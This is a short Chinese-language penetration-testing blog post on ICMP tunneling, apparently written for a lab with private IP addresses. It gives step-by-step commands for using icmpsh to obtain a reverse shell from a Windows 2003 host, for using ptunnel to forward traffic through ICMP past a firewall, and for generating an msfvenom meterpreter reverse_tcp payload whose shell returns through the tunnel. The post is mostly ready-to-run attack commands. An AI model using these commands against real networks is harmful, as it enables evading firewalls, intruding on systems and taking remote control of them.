icmp隧道

作者: Instu | 来源:发表于2019-07-27 23:38 被阅读85次

    内网渗透时,如果防火墙只允许ICMP流量通过,可以使用ICMP隧道技术。
    缺点:需要root/administrator权限。

    环境一

    kali通过icmp隧道获得2003的shell

    • kali,192.168.1.104
    • 2003,192.168.1.105
    1. kali上执行
    git clone https://github.com/inquisb/icmpsh.git
    apt-get install python-impacket
    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    python icmpsh_m.py 192.168.1.104 192.168.1.105
    
    1. 2003上执行
    icmpsh.exe -t 192.168.1.104 -d 500 -b 30 -s 128
    
    1. kali获得2003的shell
    image.png

    环境二

    使用kali访问2003的web服务,ptunnel下载地址:
    https://pkgs.org/download/ptunnel

    • kali,192.168.1.104
    • 2003,192.168.10.134
    • centos,192.168.1.102和192.168.10.136
    1. centos上执行
    rpm -ivh ptunnel-0.70-1.el6.rf.i686.rpm 安装ptunnel
    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    ptunnel -x 123 开启icmp隧道服务端,密码123
    
    1. kali上执行
    -p  指定icmp隧道服务端ip
    -lp  指定本地转发端口
    -da  指定要访问的机器ip
    -dp  指定要访问的机器端口
    ptunnel -p 192.168.1.102 -lp 1080 -da 192.168.10.134 -dp 80 -x 123
    

    此时,访问kali的1080端口,相当于访问2003的80端口。

    image.png

    环境三

    将2003的shell反弹到kali上

    • kali,192.168.1.104
    • 2003,192.168.10.134
    • centos,192.168.1.102和192.168.10.136
    1. kali上执行
    ptunnel -x 123
    
    1. centos上执行
    ptunnel -p 192.168.1.104 -lp 1080 -da 192.168.1.104 -dp 4444 -x 123
    
    1. kali上生成shell.exe
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.136 LPORT=1080 -f exe > shell.exe
    

    在2003上执行shell.exe,kali成功接收到2003的shell

    image.png

    相关文章

      网友评论

        本文标题:icmp隧道

        本文链接:https://www.haomeiwen.com/subject/kkqerctx.html